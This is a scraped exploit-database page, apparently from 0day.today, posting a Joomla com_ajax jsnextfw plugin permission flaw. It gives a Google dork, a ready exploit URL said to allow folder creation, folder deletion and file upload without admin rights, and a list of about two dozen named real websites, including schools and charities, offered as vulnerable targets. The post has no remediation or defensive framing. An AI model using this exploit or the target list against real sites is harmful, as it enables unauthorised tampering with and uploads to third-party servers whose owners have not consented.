0day.today - Il più grande database di exploit nel mondo.
![](/img/logo_green.jpg)
Utilizziamo un dominio principale DOMAIN_LINK
Se vuoi acquistare l'exploit o ottenerlo, devi comprare i Gold. Non vogliamo che utilizzi i tool di hacking per atttività illecite sul nostro sito web, quindi ogni azione può avere effetti illegali su utenti e sul nostro sito web verrai bannato. ed il tuo account con i tuoi dati verranno distrutti.
L'amministrazione del sito usa contatti ufficiali. Attenzione agli istruttori!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Leggere il [ accordo ]
- Leggere il [ Submit ] regole
- Visita il [ faq ] page
- [ Registrati ] profilo
- ottieni [ Oro ]
- Se vuoi [ vendere ]
- Se vuoi [ comprare ]
- se hai perso [ Account ]
- Qualsiasi domanda [ [email protected] ]
- Autorizzazione della Pagina
- Registrazione della pagina
- Ripristina l'account della pagina
- FAQ pagina
- Pagina dei contatti
- Regole di pubblicazione
- Pagina degli accordi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ci puoi contattare tramite:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Joomla Com_Ajax Component Jsnextfw Plugin Jform_Article Incorrect Default Permission Vulnerability
Autore
Rischio
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
Categoria
Data inserimento
Piattaforma
# Exploit Title : Joomla Com_Ajax Component Jsnextfw Plugin Jform_Article Incorrect Default Permission Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 24/10/2018 # Vendor Homepage : joomla.org # Tested On : Windows and Linux # Category : WebApps # Google Dork : inurl:/index.php?option=com_ajax # Exploit Risk : Medium # CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-287 - [ Improper Authentication ] - CWE-399 - [ Resource Management Errors ] + CWE-20 - [ Improper Input Validation ] - CWE-284 - [ Improper Access Control ] + CWE-306 - [ Missing Authentication for Critical Function ] ################################################################################################# # Admin Panel Login Path => /administrator # Check for Error Message and Vulnerability on the websites => /index.php?option=com_ajax&format=json /PATH/index.php?option=com_ajax&format=json /index.php/component/ajax/ {"success":true,"message":null,"messages":null,"data":null} # Exploit => /index.php?option=com_ajax&format=html&plugin=jsnextfw&context=media-selector&type=image&folder= images&6142fd345ac817417f35bde90a0ed787=1&editor=jform_articletext&tmpl=component # Directory Path => /images/... Note => # We can create a folder. # We can Delete Folder[s] # Upload a File without administration permissions. ################################################################################################# # Example Vulnerable Sites => stpsahid.ac.id/index.php?option=com_ajax&format=html&plugin=jsnextfw&context=media-selector&type=image&folder= images&6142fd345ac817417f35bde90a0ed787=1&editor=jform_articletext&tmpl=component joomla.org/index.php?option=com_ajax&format=json => [ Proof of Concept ] => archive.is/77gHL impostos.ad/index.php?option=com_ajax&format=json bplimmobiliare.it/joomla/index.php?option=com_ajax&format=json camntech.com/index.php?option=com_ajax&format=json aavopl.org/index.php?option=com_ajax&format=json burnetts-ea.com/index.php?option=com_ajax&format=json driffieldschool.net/index.php?option=com_ajax&format=json aspenoss.com/index.php?option=com_ajax&format=json atrainability.co.uk/index.php?option=com_ajax&format=json emotionfactory.com/index.php?option=com_ajax&format=json felicitysarran.co.uk/index.php?option=com_ajax&format=json accesstalent.co.uk/index.php?option=com_ajax&format=json abc.org.uk/index.php?option=com_ajax&format=json astonacademy.org/index.php?option=com_ajax&format=json catholiceducation.org.uk/index.php?option=com_ajax&format=json burystedmundsramblers.org.uk/index.php?option=com_ajax&format=json pefc.org/index.php?option=com_ajax&format=json learning-disability.org.uk/index.php?option=com_ajax&format=json lesresidencesniable.com/index.php?option=com_ajax&format=json smrt.bristol.sch.uk/index.php?option=com_ajax&format=json flonflons.eu/index.php?option=com_ajax&format=json keadventure.com/index.php?option=com_ajax&format=json uzvonu.com/cs/?option=com_ajax&format=json ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ################################################################################################# # 0day.today [2024-07-04] #